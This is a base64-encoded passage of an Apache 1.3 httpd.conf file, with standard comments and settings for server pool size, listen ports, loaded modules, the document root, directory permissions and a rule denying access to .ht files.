cXVlc3RzIDEwMAoKIwojIEtlZXBBbGl2ZVRpbWVvdXQ6IE51bWJlciBvZiBzZWNvbmRzIHRvIHdh aXQgZm9yIHRoZSBuZXh0IHJlcXVlc3QgZnJvbSB0aGUKIyBzYW1lIGNsaWVudCBvbiB0aGUgc2Ft ZSBjb25uZWN0aW9uLgojCktlZXBBbGl2ZVRpbWVvdXQgMTUKCiMKIyBTZXJ2ZXItcG9vbCBzaXpl IHJlZ3VsYXRpb24uICBSYXRoZXIgdGhhbiBtYWtpbmcgeW91IGd1ZXNzIGhvdyBtYW55CiMgc2Vy dmVyIHByb2Nlc3NlcyB5b3UgbmVlZCwgQXBhY2hlIGR5bmFtaWNhbGx5IGFkYXB0cyB0byB0aGUg bG9hZCBpdAojIHNlZXMgLS0tIHRoYXQgaXMsIGl0IHRyaWVzIHRvIG1haW50YWluIGVub3VnaCBz ZXJ2ZXIgcHJvY2Vzc2VzIHRvCiMgaGFuZGxlIHRoZSBjdXJyZW50IGxvYWQsIHBsdXMgYSBmZXcg c3BhcmUgc2VydmVycyB0byBoYW5kbGUgdHJhbnNpZW50CiMgbG9hZCBzcGlrZXMgKGUuZy4sIG11 bHRpcGxlIHNpbXVsdGFuZW91cyByZXF1ZXN0cyBmcm9tIGEgc2luZ2xlCiMgTmV0c2NhcGUgYnJv d3NlcikuCiMKIyBJdCBkb2VzIHRoaXMgYnkgcGVyaW9kaWNhbGx5IGNoZWNraW5nIGhvdyBtYW55 IHNlcnZlcnMgYXJlIHdhaXRpbmcKIyBmb3IgYSByZXF1ZXN0LiAgSWYgdGhlcmUgYXJlIGZld2Vy IHRoYW4gTWluU3BhcmVTZXJ2ZXJzLCBpdCBjcmVhdGVzCiMgYSBuZXcgc3BhcmUuICBJZiB0aGVy ZSBhcmUgbW9yZSB0aGFuIE1heFNwYXJlU2VydmVycywgc29tZSBvZiB0aGUKIyBzcGFyZXMgZGll IG9mZi4gIFRoZSBkZWZhdWx0IHZhbHVlcyBhcmUgcHJvYmFibHkgT0sgZm9yIG1vc3Qgc2l0ZXMu CiMKTWluU3BhcmVTZXJ2ZXJzIDUKTWF4U3BhcmVTZXJ2ZXJzIDEwCgojCiMgTnVtYmVyIG9mIHNl cnZlcnMgdG8gc3RhcnQgaW5pdGlhbGx5IC0tLSBzaG91bGQgYmUgYSByZWFzb25hYmxlIGJhbGxw YXJrCiMgZmlndXJlLgojClN0YXJ0U2VydmVycyA1CgojCiMgTGltaXQgb24gdG90YWwgbnVtYmVy IG9mIHNlcnZlcnMgcnVubmluZywgaS5lLiwgbGltaXQgb24gdGhlIG51bWJlcgojIG9mIGNsaWVu dHMgd2hvIGNhbiBzaW11bHRhbmVvdXNseSBjb25uZWN0IC0tLSBpZiB0aGlzIGxpbWl0IGlzIGV2 ZXIKIyByZWFjaGVkLCBjbGllbnRzIHdpbGwgYmUgTE9DS0VEIE9VVCwgc28gaXQgc2hvdWxkIE5P VCBCRSBTRVQgVE9PIExPVy4KIyBJdCBpcyBpbnRlbmRlZCBtYWlubHkgYXMgYSBicmFrZSB0byBr ZWVwIGEgcnVuYXdheSBzZXJ2ZXIgZnJvbSB0YWtpbmcKIyB0aGUgc3lzdGVtIHdpdGggaXQgYXMg aXQgc3BpcmFscyBkb3duLi4uCiMKTWF4Q2xpZW50cyAxNTAKCiMKIyBNYXhSZXF1ZXN0c1BlckNo aWxkOiB0aGUgbnVtYmVyIG9mIHJlcXVlc3RzIGVhY2ggY2hpbGQgcHJvY2VzcyBpcwojIGFsbG93 ZWQgdG8gcHJvY2VzcyBiZWZvcmUgdGhlIGNoaWxkIGRpZXMuICBUaGUgY2hpbGQgd2lsbCBleGl0 IHNvCiMgYXMgdG8gYXZvaWQgcHJvYmxlbXMgYWZ0ZXIgcHJvbG9uZ2VkIHVzZSB3aGVuIEFwYWNo ZSAoYW5kIG1heWJlIHRoZQojIGxpYnJhcmllcyBpdCB1c2VzKSBsZWFrIG1lbW9yeSBvciBvdGhl ciByZXNvdXJjZXMuICBPbiBtb3N0IHN5c3RlbXMsIHRoaXMKIyBpc24ndCByZWFsbHkgbmVlZGVk LCBidXQgYSBmZXcgKHN1Y2ggYXMgU29sYXJpcykgZG8gaGF2ZSBub3RhYmxlIGxlYWtzCiMgaW4g dGhlIGxpYnJhcmllcy4gRm9yIHRoZXNlIHBsYXRmb3Jtcywgc2V0IHRvIHNvbWV0aGluZyBsaWtl IDEwMDAwCiMgb3Igc287IGEgc2V0dGluZyBvZiAwIG1lYW5zIHVubGltaXRlZC4KIwojIE5PVEU6 IFRoaXMgdmFsdWUgZG9lcyBub3QgaW5jbHVkZSBrZWVwYWxpdmUgcmVxdWVzdHMgYWZ0ZXIgdGhl IGluaXRpYWwKIyAgICAgICByZXF1ZXN0IHBlciBjb25uZWN0aW9uLiBGb3IgZXhhbXBsZSwgaWYg YSBjaGlsZCBwcm9jZXNzIGhhbmRsZXMKIyAgICAgICBhbiBpbml0aWFsIHJlcXVlc3QgYW5kIDEw IHN1YnNlcXVlbnQgImtlcHRhbGl2ZSIgcmVxdWVzdHMsIGl0CiMgICAgICAgd291bGQgb25seSBj b3VudCBhcyAxIHJlcXVlc3QgdG93YXJkcyB0aGlzIGxpbWl0LgojCk1heFJlcXVlc3RzUGVyQ2hp bGQgMAoKIwojIExpc3RlbjogQWxsb3dzIHlvdSB0byBiaW5kIEFwYWNoZSB0byBzcGVjaWZpYyBJ UCBhZGRyZXNzZXMgYW5kL29yCiMgcG9ydHMsIGluIGFkZGl0aW9uIHRvIHRoZSBkZWZhdWx0LiBT ZWUgYWxzbyB0aGUgPFZpcnR1YWxIb3N0PgojIGRpcmVjdGl2ZS4KIwojTGlzdGVuIDMwMDAKI0xp c3RlbiAxMi4zNC41Ni43ODo4MApMaXN0ZW4gNTU4MApMaXN0ZW4gNTU0MwojTGlzdGVuIDg3MjEK CiMKIyBCaW5kQWRkcmVzczogWW91IGNhbiBzdXBwb3J0IHZpcnR1YWwgaG9zdHMgd2l0aCB0aGlz IG9wdGlvbi4gVGhpcyBkaXJlY3RpdmUKIyBpcyB1c2VkIHRvIHRlbGwgdGhlIHNlcnZlciB3aGlj aCBJUCBhZGRyZXNzIHRvIGxpc3RlbiB0by4gSXQgY2FuIGVpdGhlcgojIGNvbnRhaW4gIioiLCBh biBJUCBhZGRyZXNzLCBvciBhIGZ1bGx5IHF1YWxpZmllZCBJbnRlcm5ldCBkb21haW4gbmFtZS4K IyBTZWUgYWxzbyB0aGUgPFZpcnR1YWxIb3N0PiBhbmQgTGlzdGVuIGRpcmVjdGl2ZXMuCiMKI0Jp bmRBZGRyZXNzICoKCiMKIyBEeW5hbWljIFNoYXJlZCBPYmplY3QgKERTTykgU3VwcG9ydAojCiMg VG8gYmUgYWJsZSB0byB1c2UgdGhlIGZ1bmN0aW9uYWxpdHkgb2YgYSBtb2R1bGUgd2hpY2ggd2Fz IGJ1aWx0IGFzIGEgRFNPIHlvdQojIGhhdmUgdG8gcGxhY2UgY29ycmVzcG9uZGluZyBgTG9hZE1v ZHVsZScgbGluZXMgYXQgdGhpcyBsb2NhdGlvbiBzbyB0aGUKIyBkaXJlY3RpdmVzIGNvbnRhaW5l ZCBpbiBpdCBhcmUgYWN0dWFsbHkgYXZhaWxhYmxlIF9iZWZvcmVfIHRoZXkgYXJlIHVzZWQuCiMg UGxlYXNlIHJlYWQgdGhlIGZpbGUgaHR0cDovL2h0dHBkLmFwYWNoZS5vcmcvZG9jcy9kc28uaHRt bCBmb3IgbW9yZQojIGRldGFpbHMgYWJvdXQgdGhlIERTTyBtZWNoYW5pc20gYW5kIHJ1biBgaHR0 cGQgLWwnIGZvciB0aGUgbGlzdCBvZiBhbHJlYWR5CiMgYnVpbHQtaW4gKHN0YXRpY2FsbHkgbGlu a2VkIGFuZCB0aHVzIGFsd2F5cyBhdmFpbGFibGUpIG1vZHVsZXMgaW4geW91ciBodHRwZAojIGJp bmFyeS4KIwojIE5vdGU6IFRoZSBvcmRlciBpbiB3aGljaCBtb2R1bGVzIGFyZSBsb2FkZWQgaXMg aW1wb3J0YW50LiAgRG9uJ3QgY2hhbmdlCiMgdGhlIG9yZGVyIGJlbG93IHdpdGhvdXQgZXhwZXJ0 IGFkdmljZS4KIwojIEV4YW1wbGU6CiMgTG9hZE1vZHVsZSBmb29fbW9kdWxlIGxpYmV4ZWMvbW9k X2Zvby5zbwojTG9hZE1vZHVsZSByZXdyaXRlX21vZHVsZSAgICAgbGliZXhlYy9tb2RfcmV3cml0 ZS5zbwojTG9hZE1vZHVsZSBkYm1fYXV0aF9tb2R1bGUgICAgbGliZXhlYy9tb2RfYXV0aF9kYm0u c28KI0xvYWRNb2R1bGUgcHJveHlfbW9kdWxlICAgICAgIC90ZXVyL2NyZS9hcGFldTExL3d3dy9h cGFjaGUvbGliZXhlYy9saWJwcm94eS5zbwoKQ2xlYXJtb2R1bGVMaXN0CiNBZGRtb2R1bGUgaHR0 cF9jb3JlLmMgICAgICAgICAKQWRkbW9kdWxlIG1vZF92aG9zdF9hbGlhcy5jICAgCkFkZG1vZHVs ZSBtb2RfZW52LmMgICAgICAgICAgIApBZGRtb2R1bGUgbW9kX2RlZmluZS5jICAgICAgICAKQWRk bW9kdWxlIG1vZF9sb2dfY29uZmlnLmMgICAgCkFkZG1vZHVsZSBtb2RfbWltZV9tYWdpYy5jICAg IApBZGRtb2R1bGUgbW9kX21pbWUuYyAgICAgICAgICAKQWRkbW9kdWxlIG1vZF9uZWdvdGlhdGlv bi5jICAgCkFkZG1vZHVsZSBtb2Rfc3RhdHVzLmMgICAgICAgIApBZGRtb2R1bGUgbW9kX2luZm8u YyAgICAgICAgICAKQWRkbW9kdWxlIG1vZF9pbmNsdWRlLmMgICAgICAgCkFkZG1vZHVsZSBtb2Rf YXV0b2luZGV4LmMgICAgIApBZGRtb2R1bGUgbW9kX2Rpci5jICAgICAgICAgICAKQWRkbW9kdWxl IG1vZF9jZ2kuYyAgICAgICAgICAgCkFkZG1vZHVsZSBtb2RfYXNpcy5jICAgICAgICAgIApBZGRt b2R1bGUgbW9kX2ltYXAuYyAgICAgICAgICAKQWRkbW9kdWxlIG1vZF9hY3Rpb25zLmMgICAgICAg CkFkZG1vZHVsZSBtb2Rfc3BlbGluZy5jICAgICAgIApBZGRtb2R1bGUgbW9kX3VzZXJkaXIuYyAg ICAgICAKQWRkbW9kdWxlIG1vZF9hbGlhcy5jICAgICAgICAgCkFkZG1vZHVsZSBtb2RfcmV3cml0 ZS5jICAgICAgIApBZGRtb2R1bGUgbW9kX2FjY2Vzcy5jICAgICAgICAKQWRkbW9kdWxlIG1vZF9h dXRoLmMgICAgICAgICAgCkFkZG1vZHVsZSBtb2RfYXV0aF9hbm9uLmMgICAgIApBZGRtb2R1bGUg bW9kX2F1dGhfZGJtLmMgICAgICAKQWRkbW9kdWxlIG1vZF9kaWdlc3QuYyAgICAgICAgCkFkZG1v ZHVsZSBtb2RfcHJveHkuYyAgICAgICAgIApBZGRtb2R1bGUgbW9kX2Nlcm5fbWV0YS5jICAgICAK QWRkbW9kdWxlIG1vZF9leHBpcmVzLmMgICAgICAgCkFkZG1vZHVsZSBtb2RfaGVhZGVycy5jICAg ICAgIApBZGRtb2R1bGUgbW9kX3VzZXJ0cmFjay5jICAgICAKQWRkbW9kdWxlIG1vZF91bmlxdWVf aWQuYyAgICAgCkFkZG1vZHVsZSBtb2Rfc2V0ZW52aWYuYyAgICAgIApBZGRtb2R1bGUgbW9kX3Nz bC5jICAgICAgICAgICAKCiMKIyBFeHRlbmRlZFN0YXR1cyBjb250cm9scyB3aGV0aGVyIEFwYWNo ZSB3aWxsIGdlbmVyYXRlICJmdWxsIiBzdGF0dXMKIyBpbmZvcm1hdGlvbiAoRXh0ZW5kZWRTdGF0 dXMgT24pIG9yIGp1c3QgYmFzaWMgaW5mb3JtYXRpb24gKEV4dGVuZGVkU3RhdHVzCiMgT2ZmKSB3 aGVuIHRoZSAic2VydmVyLXN0YXR1cyIgaGFuZGxlciBpcyBjYWxsZWQuIFRoZSBkZWZhdWx0IGlz IE9mZi4KIwpFeHRlbmRlZFN0YXR1cyBPbgoKIyMjIFNlY3Rpb24gMjogJ01haW4nIHNlcnZlciBj b25maWd1cmF0aW9uCiMKIyBUaGUgZGlyZWN0aXZlcyBpbiB0aGlzIHNlY3Rpb24gc2V0IHVwIHRo ZSB2YWx1ZXMgdXNlZCBieSB0aGUgJ21haW4nCiMgc2VydmVyLCB3aGljaCByZXNwb25kcyB0byBh bnkgcmVxdWVzdHMgdGhhdCBhcmVuJ3QgaGFuZGxlZCBieSBhCiMgPFZpcnR1YWxIb3N0PiBkZWZp bml0aW9uLiAgVGhlc2UgdmFsdWVzIGFsc28gcHJvdmlkZSBkZWZhdWx0cyBmb3IKIyBhbnkgPFZp cnR1YWxIb3N0PiBjb250YWluZXJzIHlvdSBtYXkgZGVmaW5lIGxhdGVyIGluIHRoZSBmaWxlLgoj CiMgQWxsIG9mIHRoZXNlIGRpcmVjdGl2ZXMgbWF5IGFwcGVhciBpbnNpZGUgPFZpcnR1YWxIb3N0 PiBjb250YWluZXJzLAojIGluIHdoaWNoIGNhc2UgdGhlc2UgZGVmYXVsdCBzZXR0aW5ncyB3aWxs IGJlIG92ZXJyaWRkZW4gZm9yIHRoZQojIHZpcnR1YWwgaG9zdCBiZWluZyBkZWZpbmVkLgojCgoj CiMgSWYgeW91ciBTZXJ2ZXJUeXBlIGRpcmVjdGl2ZSAoc2V0IGVhcmxpZXIgaW4gdGhlICdHbG9i YWwgRW52aXJvbm1lbnQnCiMgc2VjdGlvbikgaXMgc2V0IHRvICJpbmV0ZCIsIHRoZSBuZXh0IGZl dyBkaXJlY3RpdmVzIGRvbid0IGhhdmUgYW55CiMgZWZmZWN0IHNpbmNlIHRoZWlyIHNldHRpbmdz IGFyZSBkZWZpbmVkIGJ5IHRoZSBpbmV0ZCBjb25maWd1cmF0aW9uLgojIFNraXAgYWhlYWQgdG8g dGhlIFNlcnZlckFkbWluIGRpcmVjdGl2ZS4KIwoKIwojIFBvcnQ6IFRoZSBwb3J0IHRvIHdoaWNo IHRoZSBzdGFuZGFsb25lIHNlcnZlciBsaXN0ZW5zLiBGb3IKIyBwb3J0cyA8IDEwMjMsIHlvdSB3 aWxsIG5lZWQgaHR0cGQgdG8gYmUgcnVuIGFzIHJvb3QgaW5pdGlhbGx5LgojCiNQb3J0IDgwODAK UG9ydCA1NTgwClBvcnQgNTU0MwoKIyMKIyMgIFNTTCBTdXBwb3J0CiMjCiMjICBXaGVuIHdlIGFs c28gcHJvdmlkZSBTU0wgd2UgaGF2ZSB0byBsaXN0ZW4gdG8gdGhlIAojIyAgc3RhbmRhcmQgSFRU UCBwb3J0IChzZWUgYWJvdmUpIGFuZCB0byB0aGUgSFRUUFMgcG9ydAojIwojPElmRGVmaW5lIFNT TD4KI0xpc3RlbiA4MDgwCiNMaXN0ZW4gODQ0MwojTGlzdGVuIDU1ODAKI0xpc3RlbiA1NTQzCiM8 L0lmRGVmaW5lPgoKIwojIElmIHlvdSB3aXNoIGh0dHBkIHRvIHJ1biBhcyBhIGRpZmZlcmVudCB1 c2VyIG9yIGdyb3VwLCB5b3UgbXVzdCBydW4KIyBodHRwZCBhcyByb290IGluaXRpYWxseSBhbmQg aXQgd2lsbCBzd2l0Y2guICAKIwojIFVzZXIvR3JvdXA6IFRoZSBuYW1lIChvciAjbnVtYmVyKSBv ZiB0aGUgdXNlci9ncm91cCB0byBydW4gaHR0cGQgYXMuCiMgIC4gT24gU0NPIChPRFQgMykgdXNl ICJVc2VyIG5vdXNlciIgYW5kICJHcm91cCBub2dyb3VwIi4KIyAgLiBPbiBIUFVYIHlvdSBtYXkg bm90IGJlIGFibGUgdG8gdXNlIHNoYXJlZCBtZW1vcnkgYXMgbm9ib2R5LCBhbmQgdGhlCiMgICAg c3VnZ2VzdGVkIHdvcmthcm91bmQgaXMgdG8gY3JlYXRlIGEgdXNlciB3d3cgYW5kIHVzZSB0aGF0 IHVzZXIuCiMgIE5PVEUgdGhhdCBzb21lIGtlcm5lbHMgcmVmdXNlIHRvIHNldGdpZChHcm91cCkg b3Igc2VtY3RsKElQQ19TRVQpCiMgIHdoZW4gdGhlIHZhbHVlIG9mICh1bnNpZ25lZClHcm91cCBp cyBhYm92ZSA2MDAwMDsgCiMgIGRvbid0IHVzZSBHcm91cCBub2JvZHkgb24gdGhlc2Ugc3lzdGVt cyEKIwpVc2VyIG5vYm9keQpHcm91cCBub2JvZHkKCiMKIyBTZXJ2ZXJBZG1pbjogWW91ciBhZGRy ZXNzLCB3aGVyZSBwcm9ibGVtcyB3aXRoIHRoZSBzZXJ2ZXIgc2hvdWxkIGJlCiMgZS1tYWlsZWQu ICBUaGlzIGFkZHJlc3MgYXBwZWFycyBvbiBzb21lIHNlcnZlci1nZW5lcmF0ZWQgcGFnZXMsIHN1 Y2gKIyBhcyBlcnJvciBkb2N1bWVudHMuCiMKU2VydmVyQWRtaW4gdGFwYWV1MTFAaWhxcjAyYTEu cG9ubC5jby51awoKIwojIFNlcnZlck5hbWUgYWxsb3dzIHlvdSB0byBzZXQgYSBob3N0IG5hbWUg d2hpY2ggaXMgc2VudCBiYWNrIHRvIGNsaWVudHMgZm9yCiMgeW91ciBzZXJ2ZXIgaWYgaXQncyBk aWZmZXJlbnQgdGhhbiB0aGUgb25lIHRoZSBwcm9ncmFtIHdvdWxkIGdldCAoaS5lLiwgdXNlCiMg Ind3dyIgaW5zdGVhZCBvZiB0aGUgaG9zdCdzIHJlYWwgbmFtZSkuCiMKIyBOb3RlOiBZb3UgY2Fu bm90IGp1c3QgaW52ZW50IGhvc3QgbmFtZXMgYW5kIGhvcGUgdGhleSB3b3JrLiBUaGUgbmFtZSB5 b3UgCiMgZGVmaW5lIGhlcmUgbXVzdCBiZSBhIHZhbGlkIEROUyBuYW1lIGZvciB5b3VyIGhvc3Qu IElmIHlvdSBkb24ndCB1bmRlcnN0YW5kCiMgdGhpcywgYXNrIHlvdXIgbmV0d29yayBhZG1pbmlz dHJhdG9yLgojIElmIHlvdXIgaG9zdCBkb2Vzbid0IGhhdmUgYSByZWdpc3RlcmVkIEROUyBuYW1l LCBlbnRlciBpdHMgSVAgYWRkcmVzcyBoZXJlLgojIFlvdSB3aWxsIGhhdmUgdG8gYWNjZXNzIGl0 IGJ5IGl0cyBhZGRyZXNzIChlLmcuLCBodHRwOi8vMTIzLjQ1LjY3Ljg5LykKIyBhbnl3YXksIGFu ZCB0aGlzIHdpbGwgbWFrZSByZWRpcmVjdGlvbnMgd29yayBpbiBhIHNlbnNpYmxlIHdheS4KIwoj IDEyNy4wLjAuMSBpcyB0aGUgVENQL0lQIGxvY2FsIGxvb3AtYmFjayBhZGRyZXNzLCBvZnRlbiBu YW1lZCBsb2NhbGhvc3QuIFlvdXIgCiMgbWFjaGluZSBhbHdheXMga25vd3MgaXRzZWxmIGJ5IHRo aXMgYWRkcmVzcy4gSWYgeW91IHVzZSBBcGFjaGUgc3RyaWN0bHkgZm9yIAojIGxvY2FsIHRlc3Rp bmcgYW5kIGRldmVsb3BtZW50LCB5b3UgbWF5IHVzZSAxMjcuMC4wLjEgYXMgdGhlIHNlcnZlciBu YW1lLgojClNlcnZlck5hbWUgMTk0LjM2LjI0NS4xNDUKI2locXIwMmExLnBvbmwuY28udWsKCiMK IyBEb2N1bWVudFJvb3Q6IFRoZSBkaXJlY3Rvcnkgb3V0IG9mIHdoaWNoIHlvdSB3aWxsIHNlcnZl IHlvdXIKIyBkb2N1bWVudHMuIEJ5IGRlZmF1bHQsIGFsbCByZXF1ZXN0cyBhcmUgdGFrZW4gZnJv bSB0aGlzIGRpcmVjdG9yeSwgYnV0CiMgc3ltYm9saWMgbGlua3MgYW5kIGFsaWFzZXMgbWF5IGJl IHVzZWQgdG8gcG9pbnQgdG8gb3RoZXIgbG9jYXRpb25zLgojCkRvY3VtZW50Um9vdCAiL3RldXIv Y3JlL2FwYWV1MTEvd3d3L2FwYWNoZS9odGRvY3MiCgojCiMgRWFjaCBkaXJlY3RvcnkgdG8gd2hp Y2ggQXBhY2hlIGhhcyBhY2Nlc3MsIGNhbiBiZSBjb25maWd1cmVkIHdpdGggcmVzcGVjdAojIHRv IHdoaWNoIHNlcnZpY2VzIGFuZCBmZWF0dXJlcyBhcmUgYWxsb3dlZCBhbmQvb3IgZGlzYWJsZWQg aW4gdGhhdAojIGRpcmVjdG9yeSAoYW5kIGl0cyBzdWJkaXJlY3RvcmllcykuIAojCiMgRmlyc3Qs IHdlIGNvbmZpZ3VyZSB0aGUgImRlZmF1bHQiIHRvIGJlIGEgdmVyeSByZXN0cmljdGl2ZSBzZXQg b2YgCiMgcGVybWlzc2lvbnMuICAKIwo8RGlyZWN0b3J5IC8+CiAgICBPcHRpb25zIEZvbGxvd1N5 bUxpbmtzCiAgICBBbGxvd092ZXJyaWRlIE5vbmUKPC9EaXJlY3Rvcnk+CgojCiMgTm90ZSB0aGF0 IGZyb20gdGhpcyBwb2ludCBmb3J3YXJkIHlvdSBtdXN0IHNwZWNpZmljYWxseSBhbGxvdwojIHBh cnRpY3VsYXIgZmVhdHVyZXMgdG8gYmUgZW5hYmxlZCAtIHNvIGlmIHNvbWV0aGluZydzIG5vdCB3 b3JraW5nIGFzCiMgeW91IG1pZ2h0IGV4cGVjdCwgbWFrZSBzdXJlIHRoYXQgeW91IGhhdmUgc3Bl Y2lmaWNhbGx5IGVuYWJsZWQgaXQKIyBiZWxvdy4KIwoKIwojIFRoaXMgc2hvdWxkIGJlIGNoYW5n ZWQgdG8gd2hhdGV2ZXIgeW91IHNldCBEb2N1bWVudFJvb3QgdG8uCiMKPERpcmVjdG9yeSAiL3Rl dXIvY3JlL2FwYWV1MTEvd3d3L2FwYWNoZS9odGRvY3MiPgoKIwojIFRoaXMgbWF5IGFsc28gYmUg Ik5vbmUiLCAiQWxsIiwgb3IgYW55IGNvbWJpbmF0aW9uIG9mICJJbmRleGVzIiwKIyAiSW5jbHVk ZXMiLCAiRm9sbG93U3ltTGlua3MiLCAiRXhlY0NHSSIsIG9yICJNdWx0aVZpZXdzIi4KIwojIE5v dGUgdGhhdCAiTXVsdGlWaWV3cyIgbXVzdCBiZSBuYW1lZCAqZXhwbGljaXRseSogLS0tICJPcHRp b25zIEFsbCIKIyBkb2Vzbid0IGdpdmUgaXQgdG8geW91LgojCiAgICBPcHRpb25zIEluZGV4ZXMg Rm9sbG93U3ltTGlua3MgTXVsdGlWaWV3cwoKIwojIFRoaXMgY29udHJvbHMgd2hpY2ggb3B0aW9u cyB0aGUgLmh0YWNjZXNzIGZpbGVzIGluIGRpcmVjdG9yaWVzIGNhbgojIG92ZXJyaWRlLiBDYW4g YWxzbyBiZSAiQWxsIiwgb3IgYW55IGNvbWJpbmF0aW9uIG9mICJPcHRpb25zIiwgIkZpbGVJbmZv IiwgCiMgIkF1dGhDb25maWciLCBhbmQgIkxpbWl0IgojCiAgICBBbGxvd092ZXJyaWRlIE5vbmUK CiMKIyBDb250cm9scyB3aG8gY2FuIGdldCBzdHVmZiBmcm9tIHRoaXMgc2VydmVyLgojCiAgICBP cmRlciBhbGxvdyxkZW55CiAgICBBbGxvdyBmcm9tIGFsbAo8L0RpcmVjdG9yeT4KCiMKIyBVc2Vy RGlyOiBUaGUgbmFtZSBvZiB0aGUgZGlyZWN0b3J5IHdoaWNoIGlzIGFwcGVuZGVkIG9udG8gYSB1 c2VyJ3MgaG9tZQojIGRpcmVjdG9yeSBpZiBhIH51c2VyIHJlcXVlc3QgaXMgcmVjZWl2ZWQuCiMK PElmTW9kdWxlIG1vZF91c2VyZGlyLmM+CiAgICBVc2VyRGlyIHB1YmxpY19odG1sCjwvSWZNb2R1 bGU+CgojCiMgQ29udHJvbCBhY2Nlc3MgdG8gVXNlckRpciBkaXJlY3Rvcmllcy4gIFRoZSBmb2xs b3dpbmcgaXMgYW4gZXhhbXBsZQojIGZvciBhIHNpdGUgd2hlcmUgdGhlc2UgZGlyZWN0b3JpZXMg YXJlIHJlc3RyaWN0ZWQgdG8gcmVhZC1vbmx5LgojCiM8RGlyZWN0b3J5IC9ob21lLyovcHVibGlj X2h0bWw+CiMgICAgQWxsb3dPdmVycmlkZSBGaWxlSW5mbyBBdXRoQ29uZmlnIExpbWl0CiMgICAg T3B0aW9ucyBNdWx0aVZpZXdzIEluZGV4ZXMgU3ltTGlua3NJZk93bmVyTWF0Y2ggSW5jbHVkZXNO b0V4ZWMKIyAgICA8TGltaXQgR0VUIFBPU1QgT1BUSU9OUyBQUk9QRklORD4KIyAgICAgICAgT3Jk ZXIgYWxsb3csZGVueQojICAgICAgICBBbGxvdyBmcm9tIGFsbAojICAgIDwvTGltaXQ+CiMgICAg PExpbWl0RXhjZXB0IEdFVCBQT1NUIE9QVElPTlMgUFJPUEZJTkQ+CiMgICAgICAgIE9yZGVyIGRl bnksYWxsb3cKIyAgICAgICAgRGVueSBmcm9tIGFsbAojICAgIDwvTGltaXRFeGNlcHQ+CiM8L0Rp cmVjdG9yeT4KCiMKIyBEaXJlY3RvcnlJbmRleDogTmFtZSBvZiB0aGUgZmlsZSBvciBmaWxlcyB0 byB1c2UgYXMgYSBwcmUtd3JpdHRlbiBIVE1MCiMgZGlyZWN0b3J5IGluZGV4LiAgU2VwYXJhdGUg bXVsdGlwbGUgZW50cmllcyB3aXRoIHNwYWNlcy4KIwo8SWZNb2R1bGUgbW9kX2Rpci5jPgogICAg RGlyZWN0b3J5SW5kZXggaW5kZXguaHRtbAo8L0lmTW9kdWxlPgoKIwojIEFjY2Vzc0ZpbGVOYW1l OiBUaGUgbmFtZSBvZiB0aGUgZmlsZSB0byBsb29rIGZvciBpbiBlYWNoIGRpcmVjdG9yeQojIGZv ciBhY2Nlc3MgY29udHJvbCBpbmZvcm1hdGlvbi4KIwpBY2Nlc3NGaWxlTmFtZSAuaHRhY2Nlc3MK CiMKIyBUaGUgZm9sbG93aW5nIGxpbmVzIHByZXZlbnQgLmh0YWNjZXNzIGZpbGVzIGZyb20gYmVp bmcgdmlld2VkIGJ5CiMgV2ViIGNsaWVudHMuICBTaW5jZSAuaHRhY2Nlc3MgZmlsZXMgb2Z0ZW4g Y29udGFpbiBhdXRob3JpemF0aW9uCiMgaW5mb3JtYXRpb24sIGFjY2VzcyBpcyBkaXNhbGxvd2Vk IGZvciBzZWN1cml0eSByZWFzb25zLiAgQ29tbWVudAojIHRoZXNlIGxpbmVzIG91dCBpZiB5b3Ug d2FudCBXZWIgdmlzaXRvcnMgdG8gc2VlIHRoZSBjb250ZW50cyBvZgojIC5odGFjY2VzcyBmaWxl cy4gIElmIHlvdSBjaGFuZ2UgdGhlIEFjY2Vzc0ZpbGVOYW1lIGRpcmVjdGl2ZSBhYm92ZSwKIyBi ZSBzdXJlIHRvIG1ha2UgdGhlIGNvcnJlc3BvbmRpbmcgY2hhbmdlcyBoZXJlLgojCiMgQWxzbywg Zm9sa3MgdGVuZCB0byB1c2UgbmFtZXMgc3VjaCBhcyAuaHRwYXNzd2QgZm9yIHBhc3N3b3JkCiMg ZmlsZXMsIHNvIHRoaXMgd2lsbCBwcm90ZWN0IHRob3NlIGFzIHdlbGwuCiMKPEZpbGVzIH4gIl5c Lmh0Ij4KICAgIE9yZGVyIGFsbG93LGRlbnkKICAgIERlbnkgZnJvbSBhbGwKPC9GaWxlcz4KCiMK IyBDYWNoZU5lZ290aWF0ZWREb2NzOiBCeSBkZWZhdWx0LCBBcGFjaGUgc2VuZHMgIlByYWdtYTog bm8tY2FjaGUiIHdpdGggZWFjaAojIGRvY3VtZW50IHRoYXQgd2FzIG5lZ290aWF0ZWQgb24gdGhl IGJhc2lzIG9mIGNvbnRlbnQuIFRoaXMgYXNrcyBwcm94eQojIHNlcnZlcnMgbm90IHRvIGNhY2hl IHRoZSBkb2N1bWVudC4gVW5jb21tZW50aW5nIHRoZSBmb2xsb3dpbmcgbGluZSBkaXNhYmxlcwoj IHRoaXMgYmVoYXZpb3IsIGFuZCBwcm94aWVzIHdpbGwgYmUgYWxsb3dlZCB0byBjYWNoZSB0aGUg ZG9jdW1lbnRzLgojCiNDYWNoZU5lZ290aWF0ZWREb2NzCgojCiMgVXNlQ2Fub25pY2FsTmFtZTog IChuZXcgZm9yIDEuMykgIFdpdGggdGhpcyBzZXR0aW5nIHR1cm5lZCBvbiwgd2hlbmV2ZXIKIyBB cGFjaGUgbmVlZHMgdG8gY29uc3RydWN0IGEgc2VsZi1yZWZlcmVuY2luZyBVUkwgKGEgVVJMIHRo YXQgcmVmZXJzIGJhY2sKIyB0byB0aGUgc2VydmVyIHRoZSByZXNwb25zZSBpcyBjb21pbmcgZnJv bSkgaXQgd2lsbCB1c2UgU2VydmVyTmFtZSBhbmQKIyBQb3J0IHRvIGZvcm0gYSAiY2Fub25pY2Fs IiBuYW1lLiAgV2l0aCB0aGlzIHNldHRpbmcgb2ZmLCBBcGFjaGUgd2lsbAojIHVzZSB0aGUgaG9z dG5hbWU6cG9ydCB0aGF0IHRoZSBjbGllbnQgc3VwcGxpZWQsIHdoZW4gcG9zc2libGUuICBUaGlz CiMgYWxzbyBhZmZlY3RzIFNFUlZFUl9OQU1FIGFuZCBTRVJWRVJfUE9SVCBpbiBDR0kgc2NyaXB0 cy4KIwpVc2VDYW5vbmljYWxOYW1lIE9uCgojCiMgVHlwZXNDb25maWcgZGVzY3JpYmVzIHdoZXJl IHRoZSBtaW1lLnR5cGVzIGZpbGUgKG9yIGVxdWl2YWxlbnQpIGlzCiMgdG8gYmUgZm91bmQuCiMK PElmTW9kdWxlIG1vZF9taW1lLmM+CiAgICBUeXBlc0NvbmZpZyAvdGV1ci9jcmUvYXBhZXUxMS93 